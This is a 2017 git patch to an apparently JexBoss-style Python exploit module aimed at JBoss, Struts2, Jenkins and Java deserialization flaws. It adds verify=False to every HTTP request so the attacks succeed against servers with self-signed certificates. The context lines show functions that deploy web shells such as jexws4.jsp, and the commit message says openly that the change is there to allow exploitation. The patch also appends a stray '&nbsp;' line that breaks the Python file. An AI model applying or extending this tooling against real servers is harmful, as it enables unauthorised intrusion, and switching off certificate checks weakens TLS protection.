From 9e71cf6bd9ff42f53cc349a147cbb877a7c1e7e4 Mon Sep 17 00:00:00 2001
From: Robbie <txt3rob@gmail.com>
Date: Fri, 8 Dec 2017 08:02:39 +0000
Subject: [PATCH] Update _exploits.py

when a server has a self signed SSL or you are accessing it via an IP it will fail to exploit.
added a check to ignore the SSL certificate to allow exploitation.
---
 _exploits.py | 39 ++++++++++++++++++++-------------------
 1 file changed, 20 insertions(+), 19 deletions(-)

diff --git a/_exploits.py b/_exploits.py
index 5533173..3806a1a 100644
--- a/_exploits.py
+++ b/_exploits.py
@@ -61,11 +61,11 @@ def get_successfully(url, path):
     headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                "Connection": "keep-alive",
                "User-Agent": jexboss.get_random_user_agent()}
-    r = gl_http_pool.request('GET', url + path, redirect=False, headers=headers)
+    r = gl_http_pool.request('GET', url + path, redirect=False, headers=headers, verify=False)
     result = r.status
     if result == 404:
         sleep(7)
-        r = gl_http_pool.request('GET', url + path, redirect=False, headers=headers)
+        r = gl_http_pool.request('GET', url + path, redirect=False, headers=headers, verify=False)
         result = r.status
     return result
 
@@ -100,11 +100,11 @@ def exploit_struts2_jakarta_multipart(url,cmd, cookies):
 
     headers['Content-Type'] = content_type
     if cookies is not None: headers['Cookie'] = cookies
-    r = gl_http_pool.request('GET', url, redirect=True, headers=headers)
+    r = gl_http_pool.request('GET', url, redirect=True, headers=headers, verify=False)
 
     if r.status == 404:
         headers['Content-Type'] = 'text/html'
-        r = gl_http_pool.request('GET', url, redirect=True, headers=headers)
+        r = gl_http_pool.request('GET', url, redirect=True, headers=headers, verify=False)
         if r.status == 200:
             return "   Could not get command output. You need to set up an Authoritative DNS and try to get the\n" \
                    "   output of the commands via DNS covert channel.\n"
@@ -149,7 +149,7 @@ def exploit_struts2_jakarta_multipart_v2(url,cmd, cookies):
 
     if cookies is not None: headers['Cookie'] = cookies
 
-    r = gl_http_pool.request('POST', url, redirect=True, headers=headers, body=body)
+    r = gl_http_pool.request('POST', url, redirect=True, headers=headers, body=body, verify=False)
 
     return str(r.data)
 '''
@@ -174,7 +174,7 @@ def exploit_jmx_console_main_deploy(url):
     headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                "Connection": "keep-alive",
                "User-Agent": jexboss.get_random_user_agent()}
-    gl_http_pool.request('HEAD', url + payload, redirect=False, headers=headers)
+    gl_http_pool.request('HEAD', url + payload, redirect=False, headers=headers, verify=False)
     return get_successfully(url, "/jexws4/jexws4.jsp")
 
 
@@ -264,7 +264,7 @@ def exploit_jmx_console_file_repository(url):
     headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                "Connection": "keep-alive",
                "User-Agent": jexboss.get_random_user_agent()}
-    gl_http_pool.request('HEAD', url + payload, redirect=False, headers=headers)
+    gl_http_pool.request('HEAD', url + payload, redirect=False, headers=headers, verify=False)
     return get_successfully(url, "/jexws4/jexws4.jsp")
 
 
@@ -404,12 +404,12 @@ def exploit_jmx_invoker_file_repository(url, version):
                "Connection": "keep-alive",
                "User-Agent": jexboss.get_random_user_agent()}
 
-    r = gl_http_pool.urlopen('POST', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload)
+    r = gl_http_pool.urlopen('POST', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload, verify=False)
     result = r.status
 
     if result == 401:
         jexboss.print_and_flush("   Retrying...")
-        gl_http_pool.urlopen('HEAD', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload)
+        gl_http_pool.urlopen('HEAD', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload, verify=False)
 
     return get_successfully(url, "/jexinv4/jexinv4.jsp")
 
@@ -451,11 +451,11 @@ def exploit_web_console_invoker(url):
         "Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",
         "Connection": "keep-alive",
         "User-Agent": jexboss.get_random_user_agent()}
-    r = gl_http_pool.urlopen('POST', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload)
+    r = gl_http_pool.urlopen('POST', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload, verify=False)
     result = r.status
     if result == 401:
         jexboss.print_and_flush("   Retrying...")
-        gl_http_pool.urlopen('HEAD', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload)
+        gl_http_pool.urlopen('HEAD', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload, verify=False)
 
     return get_successfully(url, "/jexws4/jexws4.jsp")
 
@@ -489,7 +489,7 @@ def exploit_servlet_deserialization(url, host, port, cmd, is_win, gadget, gadget
         "Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",
         "Connection": "keep-alive",
         "User-Agent": jexboss.get_random_user_agent()}
-    r = gl_http_pool.urlopen('POST', url, redirect=False, headers=headers, body=payload)
+    r = gl_http_pool.urlopen('POST', url, redirect=False, headers=headers, body=payload, verify=False)
     if r.status == 200:
         return 201
     else:
@@ -559,7 +559,7 @@ def exploit_application_deserialization(url, host, port, cmd, is_win, param, for
     else:
 
         # open initial page for get cookie
-        r = gl_http_pool.request('GET', url, redirect=True, headers=headers)
+        r = gl_http_pool.request('GET', url, redirect=True, headers=headers, verify=False)
         cookie = r.getheader('set-cookie')
         if cookie is not None: headers['Cookie'] = cookie
 
@@ -573,7 +573,7 @@ def exploit_application_deserialization(url, host, port, cmd, is_win, param, for
         if param_content is None:
             redirect_link = get_html_redirect_link(str(r.data))
             if redirect_link is not None:
-                r = gl_http_pool.request('GET', url + "/" + redirect_link, redirect=True, headers=headers)
+                r = gl_http_pool.request('GET', url + "/" + redirect_link, redirect=True, headers=headers, verify=False)
                 param_content = get_serialized_obj_from_param(str(r.data), param)
 
         # if param to be exploited is not ViewState, get the current viewState
@@ -642,7 +642,7 @@ def exploit_jenkins(url, host, port, cmd, is_win, gadget, show_payload):
         cli_ip = url.split('://')[1].split('/')[0].split(':')[0]
     else:
         cli_ip = url.split('/')[0].split(':')[0]
-    r = gl_http_pool.request('GET', url, redirect=True, headers=headers)
+    r = gl_http_pool.request('GET', url, redirect=True, headers=headers, verify=False)
     all_headers = r.getheaders()
     for h in all_headers:
         if 'CLI-Port' in h:
@@ -863,7 +863,7 @@ def exploit_admin_console(url, jboss_login):
         "Connection": "keep-alive",
         "User-Agent": jexboss.get_random_user_agent()}
 
-    r = gl_http_pool.request('GET', url+"/admin-console/login.seam", headers=headers)
+    r = gl_http_pool.request('GET', url+"/admin-console/login.seam", headers=headers, verify=False)
 
     if r.getheader('set-cookie') is not None:
         headers['Cookie'] = r.getheader('set-cookie')
@@ -884,15 +884,15 @@ def exploit_admin_console(url, jboss_login):
         jexboss.print_and_flush(GREEN + " * Info: Successfully logged in! Wait..." + ENDC)
         location = r.getheader('Location')
         conversation_id = location.split('=')[1]
-        r = gl_http_pool.request('GET', location, headers=headers)
+        r = gl_http_pool.request('GET', location, headers=headers, verify=False)
         if state == None:
             sleep(7)
         r = gl_http_pool.request('GET', url+"/admin-console/secure/summary.seam?path=-3%2FApplications%2FWeb+Application+%28WAR"
-                                    "%29&conversationId="+conversation_id+"&conversationPropagation=end", headers=headers)
+                                    "%29&conversationId="+conversation_id+"&conversationPropagation=end", headers=headers, verify=False)
         conversation_id = str(int(conversation_id)+1)
         r = gl_http_pool.request('GET', url+"/admin-console/secure/resourceTypeSummary.seam?actionMethod=secure%2FresourceType"
                                     "Summary.xhtml%3AcreateContentBackedResourceAction.init%28%29&conversationId="
-                                    + conversation_id, headers=headers)
+                                    + conversation_id, headers=headers, verify=False)
         state = get_viewstate_value(str(r.data))
 
         headers['Content-Type'] = "multipart/form-data; boundary=---------------------------551367293438156646377323759"
@@ -1897,3 +1897,4 @@ def shows_payload(payload, gadget_type):
     jexboss.print_and_flush(url_encode(payload))
     jexboss.print_and_flush(GREEN + "------------------------------------------------------------\n" + ENDC)
 
+&nbsp;